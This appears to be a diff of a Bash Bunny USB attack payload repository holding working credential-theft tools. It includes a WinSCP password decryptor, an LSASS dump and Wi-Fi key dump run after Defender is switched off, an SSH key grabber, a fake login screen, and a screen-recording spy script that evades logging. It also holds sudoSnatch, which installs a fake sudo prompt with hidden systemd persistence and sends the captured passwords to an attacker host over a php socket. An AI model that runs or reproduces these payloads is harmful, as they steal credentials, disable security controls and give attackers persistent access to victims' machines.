||||
####################################################################################
|
||||
####################################################################################
|
||||
## WinSCP Deobfuscation Helper Functions
|
||||
####################################################################################
|
||||
####################################################################################
|
||||
|
||||
# Gets all domain-joined computer names and properties in one object
|
||||
function GetComputersFromActiveDirectory {
|
||||
|
||||
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
|
||||
$objSearcher = New-Object System.DirectoryServices.DirectorySearcher
|
||||
$objSearcher.SearchRoot = $objDomain
|
||||
if ($ExcludeDC) {
|
||||
Write-Verbose "Skipping enumeration against the Domain Controller(s) for stealth."
|
||||
$Filter = "(&(objectCategory=computer)(!userAccountControl:1.2.840.113556.1.4.803:=8192))"
|
||||
} else {
|
||||
$Filter = "(objectCategory=computer)"
|
||||
}
|
||||
|
||||
$objSearcher.Filter = $Filter
|
||||
|
||||
$colProplist = "name"
|
||||
|
||||
foreach ($i in $colPropList){$objSearcher.PropertiesToLoad.Add($i)}
|
||||
|
||||
$objSearcher.FindAll()
|
||||
|
||||
}
|
||||
|
||||
function DecryptNextCharacterWinSCP($remainingPass) {
|
||||
|
||||
# Creates an object with flag and remainingPass properties
|
||||
$flagAndPass = "" | Select-Object -Property flag,remainingPass
|
||||
|
||||
# Shift left 4 bits equivalent for backwards compatibility with older PowerShell versions
|
||||
$firstval = ("0123456789ABCDEF".indexOf($remainingPass[0]) * 16)
|
||||
$secondval = "0123456789ABCDEF".indexOf($remainingPass[1])
|
||||
|
||||
$Added = $firstval + $secondval
|
||||
|
||||
$decryptedResult = (((-bnot ($Added -bxor $Magic)) % 256) + 256) % 256
|
||||
|
||||
$flagAndPass.flag = $decryptedResult
|
||||
$flagAndPass.remainingPass = $remainingPass.Substring(2)
|
||||
|
||||
$flagAndPass
|
||||
|
||||
}
|
||||
|
||||
function DecryptWinSCPPassword($SessionHostname, $SessionUsername, $Password) {
|
||||
|
||||
$CheckFlag = 255
|
||||
$Magic = 163
|
||||
|
||||
$len = 0
|
||||
$key = $SessionHostname + $SessionUsername
|
||||
$values = DecryptNextCharacterWinSCP($Password)
|
||||
|
||||
$storedFlag = $values.flag
|
||||
|
||||
if ($values.flag -eq $CheckFlag) {
|
||||
$values.remainingPass = $values.remainingPass.Substring(2)
|
||||
$values = DecryptNextCharacterWinSCP($values.remainingPass)
|
||||
}
|
||||
|
||||
$len = $values.flag
|
||||
|
||||
$values = DecryptNextCharacterWinSCP($values.remainingPass)
|
||||
$values.remainingPass = $values.remainingPass.Substring(($values.flag * 2))
|
||||
|
||||
$finalOutput = ""
|
||||
for ($i=0; $i -lt $len; $i++) {
|
||||
$values = (DecryptNextCharacterWinSCP($values.remainingPass))
|
||||
$finalOutput += [char]$values.flag
|
||||
}
|
||||
|
||||
if ($storedFlag -eq $CheckFlag) {
|
||||
$finalOutput.Substring($key.length)
|
||||
}
|
||||
|
||||
$finalOutput
|
||||
}
|
After Width: | Height: | Size: 51 KiB |
|
@ -0,0 +1,44 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: SessionBunny
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
GET SWITCH_POSITION
|
||||
DUCKY_LANG de
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
||||
|
||||
LED STAGE1
|
||||
|
||||
Q DELAY 1000
|
||||
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
Q ALT j
|
||||
Q DELAY 500
|
||||
|
||||
Q DELAY 1000
|
||||
Q STRING "powershell -exec bypass"
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
Q DELAY 250
|
||||
Q STRING "Import-Module((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\SessionBunny.ps1')"
|
||||
Q DELAY 250
|
||||
Q ENTER
|
||||
Q DELAY 250
|
||||
Q STRING "Invoke-SessionBunny -Everything"
|
||||
Q DELAY 250
|
||||
Q ENTER
|
||||
|
||||
LED FINISH
|
|
@ -0,0 +1,22 @@
|
|||
# Title: Fake Login
|
||||
# Description: Shows a fake login screen
|
||||
# Author: Cribbit
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: Windows (Powershell 5.1+)
|
||||
# Attackmodes: HID & STORAGE
|
||||
# Extensions: Run
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
QUACK DELAY 500
|
||||
|
||||
LED ATTACK
|
||||
|
||||
RUN WIN "powershell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\L.ps1')"
|
||||
|
||||
LED FINISH
|
|
@ -0,0 +1,45 @@
|
|||
# Fake Login
|
||||
- Author: Cribbit
|
||||
- Version: 1.0
|
||||
- Target: Windows 10 (Powershell 5.1+)
|
||||
- Category: Credentials
|
||||
- Attackmode: HID & Storage
|
||||
- Extensions: Run
|
||||
- Props: PanicAcid for testing multi-screen desktops, Foxtrot and Other Hak5 Discord members
|
||||
|
||||
## Change Log
|
||||
| Version | Changes |
|
||||
| ------- | --------------- |
|
||||
| 1.0 | Initial release |
|
||||
|
||||
## Description
|
||||
Shows a fake login screen. Saves the entered value to the loots folder on the bunny.
|
||||
|
||||
## Config
|
||||
This payload contains 9 base64 encode images.
|
||||
If you do not wish to use them you could have the files on the bunny and do something like this:
|
||||
```powershell
|
||||
$BGImg = [System.Drawing.Image]::FromFile(<PathToBunny>"bg.jpg");
|
||||
```
|
||||
or if you have web hosting or a http server running on the bunny then you can do something like:
|
||||
```powershell
|
||||
$R = Invoke-WebRequest 'https://<MyURL/IPAddress>/bg.jpg';
|
||||
$BGImg = [System.Drawing.Image]::FromStream($R.RawContentStream);
|
||||
```
|
||||
|
||||
## To Do
|
||||
Adding a To Do section just in case someone (or me if I can be bothered) want to fix some issues:
|
||||
|
||||
- Fade between time panel 1 and login panel 2
|
||||
- The beginnings of the code are there but has too much noticeable flicker.
|
||||
- Disable notifications as they display over the form:
|
||||
- HKEY\_LOCAL\_MACHINE\\Software\\Policies\\Microsoft\\Windows\\Explorer, this Explorer needs to be created, Dword32 “DisableNotificationCenter”, value as 1.
|
||||
- HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\PushNotifications, "ToastEnabled" DWORD 0 = Turn off
|
||||
- HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Notifications\\Settings\\Windows.SystemToast.AutoPlay, "Enabled" = 0
|
||||
|
||||
## Colours
|
||||
| Status | Colour | Description |
|
||||
| ------ | ----------------------------- | --------------------------- |
|
||||
| SETUP | Magenta solid | Setting attack mode |
|
||||
| ATTACK | Yellow single blink | Injecting Powershell script |
|
||||
| FINISH | Green blink followed by SOLID | Script is finished |
|
|
@ -0,0 +1,38 @@
|
|||
DELAY 5000
|
||||
GUI d
|
||||
DELAY 1200
|
||||
GUI r
|
||||
DELAY 1200
|
||||
STRING powershell -nologo -noni -ep bypass
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 2000
|
||||
LEFT
|
||||
DELAY 1000
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING mode con:cols=100 lines=1
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Set-MpPreference -DisableRealtimeMonitoring $true
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
|
||||
ENTER
|
||||
DELAY 200
|
||||
STRING $usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name; powershell -nologo -noni -ep bypass -File $usb\payloads\switch1\run.ps1
|
||||
ENTER
|
||||
DELAY 35000
|
||||
STRING function eject {$driveEject = New-Object -comObject Shell.Application;$driveEject.Namespace(17).ParseName("$usb").InvokeVerb("Eject")}
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING echo "Successful PWNd..."
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING eject
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING Set-MpPreference -DisableRealtimeMonitoring $false
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING exit
|
||||
ENTER
|
|
@ -0,0 +1,9 @@
|
|||
#!/bin/bash
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID VID_0X0D8C PID_0X0012
|
||||
LED ATTACK
|
||||
LED R B
|
||||
QUACK switch1/duck_code.txt
|
||||
sync;sleep 1;sync
|
||||
LED FINISH
|
||||
LED G
|
|
@ -0,0 +1,159 @@
|
|||
## ##
|
||||
## Ducked script by scaery v.1.0 ##
|
||||
## ________ __ .___ ##
|
||||
## \______ \ __ __ ____ | | __ ____ __| _/ ##
|
||||
## | | \| | \_/ ___\| |/ // __ \ / __ | ##
|
||||
## | ` \ | /\ \___| <\ ___// /_/ | ##
|
||||
## /_______ /____/ \___ >__|_ \\___ >____ | ##
|
||||
## \/ \/ \/ \/ \/ ##
|
||||
## ##
|
||||
## Windows Enumeration - LSASS Dump - Wifi Credential Dumper ##
|
||||
## ##
|
||||
####################################################################
|
||||
|
||||
$switch = "switch1"
|
||||
$usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name
|
||||
$usb_loot = "loot\"
|
||||
$date = Get-Date -UFormat "%Y-%m-%d-%H-%M"
|
||||
$loot = $usb + $usb_loot + $env:computername + "_" + $date
|
||||
$usb_create = New-Item -ItemType directory $loot
|
||||
$proc = "$usb\payloads\$switch\procdump.txt"
|
||||
$proc_decode = certutil -decode $proc exec.exe
|
||||
$procdump = "$usb\payloads\$switch\exec.exe"
|
||||
$proc_run = cmd.exe /c exec.exe -ma lsass.exe -accepteula "$loot\$date-lsass.$env:computername.dmp"
|
||||
$wifi = (netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Out-File $loot\$date-wifidump.log
|
||||
|
||||
$lines="------------------------------------------"
|
||||
function whost($a) {
|
||||
Write-Host
|
||||
Write-Host -ForegroundColor Green $lines
|
||||
Write-Host -ForegroundColor Green " "$a
|
||||
Write-Host -ForegroundColor Green $lines
|
||||
}
|
||||
|
||||
whost "Windows Enumeration Script v 0.1
|
||||
original by absolomb
|
||||
modified by scaery
|
||||
!!!!!!!!!"
|
||||
|
||||
$commands = [ordered]@{
|
||||
'Basic System Information' = 'Start-Process "systeminfo" -NoNewWindow -Wait';
|
||||
'Environment Variables' = 'Get-ChildItem Env: | ft Key,Value';
|
||||
'Network Information' = 'Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address';
|
||||
'DNS Servers' = 'Get-DnsClientServerAddress -AddressFamily IPv4 | ft';
|
||||
'ARP cache' = 'Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State';
|
||||
'Routing Table' = 'Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex';
|
||||
'Network Connections' = 'Start-Process "netstat" -ArgumentList "-ano" -NoNewWindow -Wait | ft';
|
||||
'Connected Drives' = 'Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft';
|
||||
'Firewall Config' = 'Start-Process "netsh" -ArgumentList "firewall show config" -NoNewWindow -Wait | ft';
|
||||
'Current User' = 'Write-Host $env:UserDomain\$env:UserName';
|
||||
'User Privileges' = 'start-process "whoami" -ArgumentList "/priv" -NoNewWindow -Wait | ft';
|
||||
'Local Users' = 'Get-LocalUser | ft Name,Enabled,LastLogon';
|
||||
'Logged in Users' = 'Start-Process "qwinsta" -NoNewWindow -Wait | ft';
|
||||
'Credential Manager' = 'start-process "cmdkey" -ArgumentList "/list" -NoNewWindow -Wait | ft'
|
||||
'User Autologon Registry Items' = 'Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" | select "Default*" | ft';
|
||||
'Local Groups' = 'Get-LocalGroup | ft Name';
|
||||
'Local Administrators EN' = 'Get-LocalGroupMember Administrators | ft Name, PrincipalSource';
|
||||
'Local Administrators DE' = 'Get-LocalGroupMember Administratoren | ft Name, PrincipalSource';
|
||||
'User Directories' = 'Get-ChildItem C:\Users | ft Name';
|
||||
'Searching for SAM backup files' = 'Test-Path %SYSTEMROOT%\repair\SAM ; Test-Path %SYSTEMROOT%\system32\config\regback\SAM';
|
||||
'Running Processes' = 'gwmi -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize';
|
||||
'Installed Software Directories' = 'Get-ChildItem "C:\Program Files", "C:\Program Files (x86)" | ft Parent,Name,LastWriteTime';
|
||||
'Software in Registry' = 'Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name';
|
||||
'Folders with Everyone Permissions' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "Everyone"} } catch {}} | ft';
|
||||
'Folders with BUILTIN\User Permissions' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "BUILTIN\Users"} } catch {}} | ft';
|
||||
'Checking registry for AlwaysInstallElevated' = 'Test-Path -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer" | ft';
|
||||
'Unquoted Service Paths' = 'gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike ''"*''} | select PathName, DisplayName, Name | ft';
|
||||
'Scheduled Tasks' = 'Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State';
|
||||
'Tasks Folder' = 'Get-ChildItem C:\Windows\Tasks | ft';
|
||||
'Startup Commands' = 'Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl';
|
||||
}
|
||||
|
||||
function RunCommands($commands) {
|
||||
ForEach ($command in $commands.GetEnumerator()) {
|
||||
whost $command.Name
|
||||
Invoke-Expression $command.Value
|
||||
}
|
||||
}
|
||||
|
||||
# Disable Notifications
|
||||
|
||||
New-Item HKCU:\Software\Policies\Microsoft\Windows\Explorer -Force
|
||||
$registryPath1 = "HKCU:\Software\Policies\Microsoft\Windows\Explorer"
|
||||
$Name1 = "DisableNotificationCenter"
|
||||
$value1 = "00000001"
|
||||
IF(!(Test-Path $registryPath1)) {
|
||||
New-Item -Path $registryPath1 -Force | Out-Null
|
||||
New-ItemProperty -Path $registryPath1 -Name $Name1 -Value $value1 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
} ELSE {
|
||||
New-ItemProperty -Path $registryPath1 -Name $Name1 -Value $value1 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
}
|
||||
|
||||
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance -Force
|
||||
$registryPath2 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance"
|
||||
$Name2 = "Enabled"
|
||||
$value2 = "00000000"
|
||||
IF(!(Test-Path $registryPath2)) {
|
||||
New-Item -Path $registryPath2 -Force | Out-Null
|
||||
New-ItemProperty -Path $registryPath2 -Name $Name2 -Value $value2 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
} ELSE {
|
||||
New-ItemProperty -Path $registryPath2 -Name $Name2 -Value $value2 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
}
|
||||
|
||||
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel -Force
|
||||
$registryPath3 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel"
|
||||
$Name3 = "Enabled"
|
||||
$value3 = "00000000"
|
||||
IF(!(Test-Path $registryPath3)) {
|
||||
New-Item -Path $registryPath3 -Force | Out-Null
|
||||
New-ItemProperty -Path $registryPath3 -Name $Name3 -Value $value3 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
} ELSE {
|
||||
New-ItemProperty -Path $registryPath3 -Name $Name3 -Value $value3 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
}
|
||||
|
||||
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay -Force
|
||||
$registryPath4 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay"
|
||||
$Name4 = "Enabled"
|
||||
$value4 = "00000000"
|
||||
IF(!(Test-Path $registryPath4)) {
|
||||
New-Item -Path $registryPath4 -Force | Out-Null
|
||||
New-ItemProperty -Path $registryPath4 -Name $Name4 -Value $value4 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
} ELSE {
|
||||
New-ItemProperty -Path $registryPath4 -Name $Name4 -Value $value4 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
}
|
||||
|
||||
$notify_disable={
|
||||
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 0
|
||||
}
|
||||
$notify_enable={
|
||||
Remove-Item $registryPath1 -Force | Out-Null
|
||||
Remove-Item $registryPath2 -Force | Out-Null
|
||||
Remove-Item $registryPath3 -Force | Out-Null
|
||||
Remove-Item $registryPath4 -Force | Out-Null
|
||||
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 1
|
||||
}
|
||||
|
||||
##################### EXECUTION STEPS ######################################
|
||||
|
||||
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force
|
||||
|
||||
Invoke-Command -Scriptblock $notify_disable
|
||||
|
||||
RunCommands($commands) > $loot\$date-winenum.log
|
||||
|
||||
whost "Procdump LSASS! AV-free! Caution: Not Defender aware!"
|
||||
$proc_run
|
||||
|
||||
whost "Dumping Wifi Credentials to USB"
|
||||
$wifi
|
||||
|
||||
whost "Hiding traces and notifications"
|
||||
Invoke-Command -Scriptblock $notify_enable
|
|
@ -0,0 +1,49 @@
|
|||
# Title: sshDump
|
||||
# Description: Taking advantage of plain stored ssh private keys in home dir, sshDump grabs them for you.
|
||||
# AUTHOR: drapl0n
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: GNU/Linux.
|
||||
# Attackmodes: HID, Storage.
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID
|
||||
GET SWITCH_POSITION
|
||||
LED ATTACK
|
||||
Q DELAY 1000
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
|
||||
# [Prevent storing history]
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Fetching BashBunny's block device]
|
||||
Q STRING lol='$(lsblk | grep 1.8G)'
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Mounting BashBunny]
|
||||
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [Looting]
|
||||
Q STRING cp -r '~/.ssh' '$mntt/loot/SSH'
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
|
||||
# [Unmounting BashBunny]
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
LED FINISH
|
|
@ -0,0 +1,48 @@
|
|||
## About:
|
||||
* Title: sudoSnatch
|
||||
* Description: sudoSnatch grabs plain text passwords remotely/locally.
|
||||
* AUTHOR: drapl0n
|
||||
* Version: 1.0
|
||||
* Category: Credentials
|
||||
* Target: Unix-like operating systems with systemd.
|
||||
* Attackmodes: HID, Storage
|
||||
|
||||
## sudoSnatch: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally.
|
||||
|
||||
### Features:
|
||||
* Plain text passwords.
|
||||
* Detailed password logs.
|
||||
* Persistent
|
||||
* Autostart payload on boot.
|
||||
|
||||
### Workflow:
|
||||
* Injecting payload on target's system.
|
||||
* Checks whether internet is connected to the target system.
|
||||
* If internet is connected then it sends clear text passwords to attacker.
|
||||
|
||||
### Changes to be made in payload.sh:
|
||||
* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `10`.
|
||||
* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `14`.
|
||||
|
||||
### LED Status:
|
||||
* `SETUP` : MAGENTA
|
||||
* `ATTACK` : YELLOW
|
||||
* `FINISH` : GREEN
|
||||
|
||||
### Directory Structure of payload components:
|
||||
| FileName | Directory |
|
||||
| -------------- | ----------------------------- |
|
||||
| payload.txt | /payloads/switch1/ |
|
||||
| payload.sh | /payloads/ |
|
||||
| shell | /payloads/library/sudoSnatch/ |
|
||||
| systemMgr | /payloads/library/sudoSnatch/ |
|
||||
|
||||
* Note: Create directory named `sudoSnatch` in `/payloads/library/`
|
||||
### Usage:
|
||||
1. Inject payload into target's system.
|
||||
2. Start netcat listner on attacking system:
|
||||
|
||||
* `nc -l -p <port number>` use this command to fetch passwords.
|
||||
|
||||
#### Support me if you like my work:
|
||||
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,23 @@
|
|||
#!/bin/bash
|
||||
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||
mkdir /var/tmp/.system
|
||||
lol=$(lsblk | grep 1.8G)
|
||||
disk=$(echo $lol | awk '{print $1}')
|
||||
mntt=$(lsblk | grep $disk | awk '{print $7}')
|
||||
cp -r $mntt/payloads/library/sudoSnatch/systemMgr /var/tmp/.system/
|
||||
chmod +x /var/tmp/.system/systemMgr
|
||||
touch /var/tmp/.system/sysLog
|
||||
echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
||||
chmod +x /var/tmp/.system/systemBus
|
||||
mkdir -p ~/.config/systemd/user
|
||||
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
|
||||
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
|
||||
chmod +x /var/tmp/.system/reboot
|
||||
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
|
||||
systemctl --user daemon-reload
|
||||
systemctl --user enable --now systemBUS.service
|
||||
systemctl --user start --now systemBUS.service
|
||||
systemctl --user enable --now reboot.service
|
||||
systemctl --user start --now reboot.service
|
||||
cp -r $mntt/payloads/library/sudoSnatch/shell /tmp/
|
||||
chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell
|
|
@ -0,0 +1,56 @@
|
|||
# Title: sudoSnatch
|
||||
# Description: sudoSnatch grabs plain text passwords remotely/locally.
|
||||
# AUTHOR: drapl0n
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: Unix-like operating systems with systemd.
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID
|
||||
GET SWITCH_POSITION
|
||||
LED ATTACK
|
||||
Q DELAY 1000
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
|
||||
# [Prevent storing history]
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Fetching BashBunny's block device]
|
||||
Q STRING lol='$(lsblk | grep 1.8G)'
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Mounting BashBunny]
|
||||
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
||||
Q ENTER
|
||||
Q DELAY 1400
|
||||
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [transfering payload script]
|
||||
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
|
||||
Q ENTER
|
||||
Q STRING chmod +x /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q STRING /tmp/./payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 5000
|
||||
Q STRING rm /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [Unmounting BashBunny]
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
LED FINISH
|
|
@ -0,0 +1,12 @@
|
|||
#!/bin/bash
|
||||
ls -a ~/ | grep 'zshrc' &> /dev/null
|
||||
if [ $? = 0 ]; then
|
||||
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
|
||||
echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.zshrc
|
||||
fi
|
||||
|
||||
ls -a ~/ | grep 'bashrc' &> /dev/null
|
||||
if [ $? = 0 ]; then
|
||||
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
|
||||
echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.bashrc
|
||||
fi
|
|
@ -0,0 +1,5 @@
|
|||
#!/bin/bash
|
||||
echo -n "[sudo] password for $(whoami):"
|
||||
IFS="" read -s pass
|
||||
echo -e "Timestamp=[$(date)] \t User=[$(whoami)] \t Password=[$pass]" >> /var/tmp/.system/sysLog
|
||||
echo -e "\nSorry, try again."
|
|
@ -0,0 +1,29 @@
|
|||
# "Microsoft Windows" Problem Steps Recorder
|
||||
|
||||
- Title: Win_ProblemStepsRecorder
|
||||
- Author: TW-D
|
||||
- Version: 1.0
|
||||
- Target: Microsoft Windows
|
||||
- Category: Credentials
|
||||
|
||||
## Description
|
||||
|
||||
1) Partially avoids "PowerShell Script Block Logging".
|
||||
2) Closing of all windows.
|
||||
3) Hide "PowerShell" window.
|
||||
4) Abuse of "Windows Problem Steps Recorder" to spy on a user's activities.
|
||||
5) Writes the file system cache to disk.
|
||||
6) Safely eject.
|
||||
|
||||
## Configuration
|
||||
|
||||
From "payload.txt" change the values of the following constants :
|
||||
```bash
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
readonly RECORDER_TIME=300
|
||||
|
||||
|
||||
```
|
|
@ -0,0 +1,50 @@
|
|||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
#
|
||||
|
||||
Param (
|
||||
[String] $BB_VOLUME,
|
||||
[Int] $RECORDER_TIME
|
||||
)
|
||||
|
||||
# Partially avoids "PowerShell Script Block Logging".
|
||||
#
|
||||
$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
|
||||
$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
|
||||
$etw_provider.SetValue($null, $event_provider)
|
||||
|
||||
# Closing of all windows.
|
||||
#
|
||||
Get-Process -Name "explorer" | Stop-Process
|
||||
|
||||
# Hide "PowerShell" window.
|
||||
#
|
||||
$Script:showWindowAsync = Add-Type -MemberDefinition @"
|
||||
[DllImport("user32.dll")]
|
||||
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
|
||||
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
|
||||
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
|
||||
|
||||
If ((Test-Path -Path "C:\Windows\System32\psr.exe")) {
|
||||
|
||||
$bb_loot = "${BB_VOLUME}loot\"
|
||||
$computer_name = $env:COMPUTERNAME
|
||||
|
||||
